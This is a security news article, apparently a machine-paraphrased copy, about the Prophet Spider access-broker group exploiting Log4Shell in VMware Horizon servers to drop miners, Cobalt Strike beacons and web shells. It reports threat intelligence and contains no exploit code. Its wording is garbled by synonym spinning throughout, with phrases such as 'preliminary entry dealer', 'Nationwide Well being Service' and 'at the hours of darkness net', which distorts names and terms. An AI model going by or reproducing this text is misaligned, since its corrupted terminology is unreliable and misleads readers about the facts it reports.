An preliminary entry dealer group tracked as Prophet Spider has been linked to a set of malicious actions that exploits the Log4Shell vulnerability in unpatched VMware Horizon Servers.
In accordance with new analysis revealed by BlackBerry Analysis & Intelligence and Incident Response (IR) groups at present, the cybercrime actor has been opportunistically weaponizing the shortcoming to obtain a second-stage payload onto the victimized techniques.
The payloads noticed embrace cryptocurrency miners, Cobalt Strike Beacons, and net shells, corroborating a earlier advisory from the U.Ok. Nationwide Well being Service (NHS) that sounded the alarm on lively exploitation of the vulnerabilities in VMware Horizon servers to drop malicious net shells and set up persistence on affected networks for follow-on assaults.
Log4Shell is a moniker used to consult with an exploit affecting the favored Apache Log4j library that ends in distant code execution by logging a specifically crafted string. Since public disclosure of the flaw final month, menace actors have been fast to operationalize this new assault vector for a wide range of intrusion campaigns to achieve full management of affected servers.
BlackBerry mentioned it noticed situations of exploitation mirroring ways, methods, and procedures (TTPs) beforehand attributed to the Prophet Spider eCrime cartel, together with the usage of “C:WindowsTemp7fde” folder path to retailer malicious recordsdata and “wget.bin” executable to fetch extra binaries in addition to overlaps in infrastructure utilized by the group.
“Prophet Spider primarily positive factors entry to victims by compromising weak net servers, and makes use of a wide range of low-prevalence instruments to realize operational aims,” CrowdStrike famous in August 2021, when the group was noticed actively exploiting flaws in Oracle WebLogic servers to achieve preliminary entry to focus on environments.
Like with many different preliminary entry brokers, the footholds are offered to the best bidder on underground boards positioned at the hours of darkness net, who then exploit the entry for ransomware deployment. Prophet Spider is thought to be lively since at the very least Could 2017.
That is removed from the primary time internet-facing techniques operating VMware Horizon have come beneath assault utilizing Log4Shell exploits. Earlier this month, Microsoft referred to as out a China-based operator tracked as DEV-0401 for deploying a brand new ransomware pressure referred to as NightSky on the compromised servers.
The onslaught in opposition to Horizon servers has additionally prompted VMware to induce its clients to apply the patches instantly. “The ramifications of this vulnerability are severe for any system, particularly ones that settle for site visitors from the open Web,” the virtualization providers supplier cautioned.
“When an entry dealer group takes curiosity in a vulnerability whose scope is so unknown, it is a good indication that attackers see important worth in its exploitation,” Tony Lee, vice chairman of worldwide providers technical operations at BlackBerry, mentioned.
“It is probably that we’ll proceed to see prison teams exploring the alternatives of the Log4Shell vulnerability, so it is an assault vector in opposition to which defenders have to train fixed vigilance,” Lee added.